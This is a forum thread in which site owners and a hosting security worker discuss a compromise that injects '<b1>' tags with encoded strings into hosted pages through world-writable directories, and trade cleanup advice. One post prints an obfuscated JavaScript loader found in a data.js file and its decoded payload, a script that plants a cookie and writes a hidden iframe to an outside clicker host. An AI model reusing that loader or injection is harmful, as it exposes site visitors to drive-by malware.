Strange <b1> HTML Tag?

[suess0r]

I recently noticed some odd HTML appear in some of the websites I host. Not all of them are run on a CMS but the majority (but not all) are running through the same FTP account.

 

I've searched everywhere for documentation, forums, notes on this particular exploit but haven't been able to find anything. Essentially, there is a small HTML snippet (see below) that appears right before the </html> tag. It's really odd and the characters inside the <b1> are all different strings.

 

Here's the code that's appearing:

<b1><!--6FY8rhRLeNoNyVsOwiAQBdAdca0PXE5DYVKngSkZrsG4ej2/B80UJt+FlytuMcbnHbmqHEcoMnS3r9aaRshnw5QN+TT+F7NMUFqviTLgXCnuyei6vU3WY3lArcgn9Ff/AVyxJcZ=--></b1>

 

It's evident that the code is some type of exploit but I'm not sure how deep this goes. Anyone heard of anything like this, or have any idea of what the potential issues that could occur? Thanks for your help!

 

-suess0r

 

[abazoskib]

maybe its xml? I know some hosts add code to your pages, for example GoDaddy adds a Doctype, head, and body tags to html if they are missing.

[suess0r]

Interesting.. I've contacted our hosting provider and they swear up and down they wouldn't have inserted that into the code. Oddly enough we've been hosting these sites for 2+ years on this particular server and haven't noticed this until now.

 

I would like to assume it's not anything dangerous, but the way it has spread itself onto the websites with the same FTP login credentials leads me to believe otherwise.

 

Oddly enough I haven't found anything on google about a <b1> HTML tag, so perhaps I'll dig around for XML to see. Any additional comments / suggestions would be great. Thanks!

[abazoskib]

maybe this will help: http://www.google.com/support/forum/p/blogger/thread?tid=0d6dbe12fc52a7cf&hl=en

 

I couldnt reads through the whole thing but seems worthy of a try.

[jkewlo]

Might be a bot <bot1>

[typedeaf]

Your site has been compromised. I recommend that you search for all files and directories that are world writable. I believe this will be what was exploited. Also, look for a file called 'data' somewhere and another file that contains php code that is mainly a variable that is base64 encoded and then eval'ed. Get rid of those. This is something that I have been investigating today and yesterday. That string between the bogus <b1> tag is a concatenation of compressed and encoded strings. I am not yet sure how it is being used by the attacker.

 

typedeaF

 

[suess0r]

Thanks typdeaf,

 

We've found a similar conclusion and have been investigating this based on the attack on atleast 2 fronts (and it sounds like 3 from what you've informed me)

 

1.) The bot embeds itself onto various files (such as index.php, footer.php, etc) that include <body> or </body> tags into it. The bot ads the following snippet of code before the <b1></b1> with a random string between that we can only presume is our FTP credentials or some other login details

 

2.) The controller file, we've found that the file (php that actually makes use of the <b1> tags) is buried randomly and discretely within various directories. We've found 3 x of these dir's and each one was different. The common thread on the controller files is that they embed themselves within sub-directories of ones that have 777 privileges (such as an image dir, etc). The directories also appear to share the same Owner and Owner Group that we are researching further.

 

I have seen a misc file called 'data' that I'll have to look out for also and get rid of. Type, have you seen this on other websites or encountered this yourself? Have you had any luck decrypting any of the encoded strings?

 

[mrMarcus]

dont' worry about decrypting .. rest assured it's malicious in one way or another.  probably an IFRAME executing a script to embed links back to different sites .. people use that method to try and gain better rankings in Google.  it can get you banned from google if that's the case.

 

anyways, change your ftp and account password, secure ALL forms and SQL on your site .. this includes all $_POST variables, etc.  CHMOD all your directories to read only, using the CHMOD command to open directory for writing only when needed (can be done with PHP).  make sure to use SSH2 or greater to connect to your FTP .. anything less and you might as well invite the bad guys over for a schmoke and a pancake.

 

that should keep you busy.

[mx209]

Had the same B1 problem today, judging from other comments it looks like its going around. We have one FTP account that is used from one location so not sure how this happened.

 

- mostly index.php and index.htm files touched

- some .xml (I guess ones with html inside)

- handful of other PHP files affected (had to contain html)

- looking at the XML files affect, it seemed if found a HTML block and put the following after it:

<b1><!--em5MZER2eNoly1EKgCAQRdEV5ZPKqOWYDiU0DsQLW35Cv/dwoZVgvA+hHzEFP68BWdRcK7lHjSzJJVM02ZGsUvqw+A2/D+dDWnWvXh/JFhpm--></b1></body></html>

 

Our ISP isn't very being helpful on this one. Has anyone found out how their systems were compromised. Is this via FTP, injection?

 

 

[mrMarcus]

how do you connect to your FTP client?  what type of connection method are you using?  not saying this is the problem, but i've seen it happen before.

[mx209]

thanks for asking.

Before today, we used regular FTP...after you suggestion I have switched to SFTP...if my ISP had the smarts to look at the IP's they could probably tell me if someone other than me accessed the site..we have one ftp and only use it from one location....

 

can you share who your ISP is (first letter perhaps)...this may be ISP specific/related..

[mrMarcus]

you mean web host?  i don't believe an ISP would have anything to do with it.  i have sites hosted on HostGator.

[suess0r]

mx209 - who are you hosting with? Marcus, we're thinking that we were exploited through a Joomla 1.0 site that we were hosting that had some 777 directories open.

 

We're in the process of eliminating, securing, and running various test cases on our file trees. Unfortunately, we don't have SSH access to our server to make it easier on securing these directories. Does anyone have any suggestions for running a Massive search for all directories that are set to 777 without SSH?

[mx209]

Mosso is my hosting provider.

 

As far as 777 is concerned. I know directories should NOT have this permission, but is it an issue if some files do?

[mrMarcus]

of course it can be.  777 gives full read/write/execute permissions to a file or folder.

[typedeaf]

dont' worry about decrypting .. rest assured it's malicious in one way or another.  probably an IFRAME executing a script to embed links back to different sites .. people use that method to try and gain better rankings in Google.  it can get you banned from google if that's the case.

 

anyways, change your ftp and account password, secure ALL forms and SQL on your site .. this includes all $_POST variables, etc.  CHMOD all your directories to read only, using the CHMOD command to open directory for writing only when needed (can be done with PHP).  make sure to use SSH2 or greater to connect to your FTP .. anything less and you might as well invite the bad guys over for a schmoke and a pancake.

 

that should keep you busy.

 

While that is good advice, it is inaccurate in this case. The information between the tags is no malicious. I have thoroughly researched this attack. There are 3 things else to look for.

1) a php file containing a variable thats value is a long string of base64 encoded and compressed characters, followed by a single eval statement. this is the remote control file and it is further obfuscated.

 

2) a plain text file called 'data'. it contains the full path to files that are world writable that it has found.

 

3) .htaccess file. the contents seem to vary as there are many revisions of this infector out there.

 

The attack vector is verified to be world writable files and directories, in every case that I have examined.

 

The data between the tag is random characters followed by the path to the current file both base64 encoded and compressed. This is quite harmless, but my expectations is that the current tag is a proof of concept that will be eventually sold on the black market to profit from pay-per-click links that can be embedded.

 

I hope this clears a lot of things up. I work security for Mosso/Rackspace Cloud Sites and we are fully investigating and aware of this issue.

 

Best protection against this, lock down your file permissions.

 

typedeaF

[kkovacsb]

A few days ago I also found this problem on a few of my sites hosted at Mosso. However I don't seem to find any file called "data", any php file that I did not put there, nor any modifications in the .htaccess files.

 

I cleaned all files of the <b1> tags and it was ok for a day, now they seem to be back again. I had one or two folders with 777 and now I CHMODed them to 775.

 

I hope this solves the problem but it still bothers me that I can't find the above mentioned files...

[keldorn]

Yeah as the guy above mentioned, its looks like a Base64 string.

This is why shared hosting is no good. You dont know what the hell is going on in the server. Anything can happen. What if someone buyd some hosting and uploadd C99shell.php and the customer now has access to the whole harddrive? I've heard these so many times, and every time is something to do with shared hosting. I have a dedicated server, this is why I wont sell any my space to anybody. Its not worth the risk.

 

This whole programming server language thing just doesn't work when its shared, if its just static files and .html is fine, but with PHP and such you can uplaod programming file that do stuff it should be doing... Thats why all you guys who say you have experience with saying your sites getting hacked, it probably becuase your on shared hosting. Its becuase the hacker got in from somebodies elses insecure site, or the shared customer themselves was a hacker who bought a shared hosting package just to hack the server.

 

I the least you can do, is get a VPS. You can get those for 50 a month. If you can afford that you should be be running website anyways thats running PHP. If you want to learn host it yourself on a homecomputer and put lamp stack on it.

 

</rant>

[keldorn]

btw On my dedicated serer I get a dozen hackers everyday trying to brute force my SSH login from different IPs that come from all the world (probably proxies of more hacked machines). So yeah, hackers are out, working full time to break into any systems they can. If you use shared hosting you may aswell consider it compromised from day one. You better keep backups constantly updated.

 

Keldorn.

[mx209]

Ditto..to the problem on Mosso..i cleaned everything up, locked everything down, switched from ftp to sftp. Disabled every other login..only have one used from one location..problem was back today.

[pillageTHENburn]

I'm not sure how helpful this will be but I have recently become aware of a strange <b1> tag at the bottom of pages on a clients site. Based on suggestions here I found a data.js file that was suspect. here's what it looked like (this is just a part of the file)

function KjkyExwkp(VjXbQk){  fff=op.split("228"); fff.op.replace("241"); } 
function MFBURYbuI(RmLDD){var HqH=5,ySHuxFH=3;var XZqq='100-0+191-2+165-0+190-0+175-0+186-2+193-1+103-1+175-0+170-0+66-2+166-2+185-0+165-0+195-0+181-2+168-1+183-1+193-1+76-2+165-0+185-0+185-0+178-1+175-0+168-1+76-2+175-0+183-1+166-2+168-1+200-0+131-2+170-0+66-2+56-2+195-0+190-0+165-0+173-1+175-0+183-1+56-2+68-1+101-2+101-2+75-0+81-2+53-1+63-1+',Izxvlerz=XZqq.split('+');wOSvDc='';for(sLWsEAW=0x2f-0x2b-0x4;sLWsEAW<Izxvlerz.length-1;sLWsEAW+=-0x1f+0x29+0x7+0x4+0x30-0xa-0x3a){ pSG=Izxvlerz[sLWsEAW].split('-');ESlbi = parseInt(pSG[0]*ySHuxFH)+parseInt(pSG[1]);ESlbi = parseInt(ESlbi)/HqH;wOSvDc += String.fromCharCode(ESlbi);}return wOSvDc;}function mzE(qojwufyo){ var yxpaZGQKfG=new Function("gZTgwqhug", "return 743469;"); } 

 

There were 10 main functions each with it's own huge string of numbers. Through trial and error I figured out how to "decipher" these functions into something readable. Concatenated together this is what I got:

<script>if(document.cookie.indexOf("urchin")==-1&&!window.navigator.userAgent.toLowerCase().match((crawler|googlebot|msnbot|yahoo|search|indexer|cuill.com|stackrambler|aport|yandex)/)){
res=newDate();
res.setTime(res.getTime()+80000000);
document.cookie="urchin="+escape("google-analytics.com")+";expires="+res.toGMTString()+";path=/";
document.write("<iframewidth=1height=1border=0frameborder=0src='http://yourclicker.com/in.cgi?2'></iframe>");
}
</script>

 

Aside from being confirmation that this is bad/malicious code I don't really know what this accomplishes.  I still don't know what the <b1> tags are or how they work or what they are doing.  The strings inside the tags are different on each page so find and replace isn't going to help me here. Oh well. I hope this helps someone.

 

Just remembered Dreamweaver's "find specific tag" option!  That'll save some time!

 

[sillyRabbit]

Having similar issue.  Found suspicious looking php scripts and a file name 'data' in images folder.

the files were:

ready.php ....contains what appears to be a backdoor to execute php

file.php  ....prob called in ready.php looks like it is what adds b1 hack code to files designated in data

jpg.php  ....prob called in ready.php  and again looks like it is what add b1 hack code to files designated in data

and the 'data' file  ...called in both file.php and jpg.php ...lists which files get hacked

 

I have removed these files from the server. have to wait and see if if they return or if the hack returns

[fortnox007]

its base64  from the look of it i think, it's probably an url to a malicious site. But your site has been takenover thats for sure.

[Alex]

Please don't bump topics that are several months old; instead just make a new one.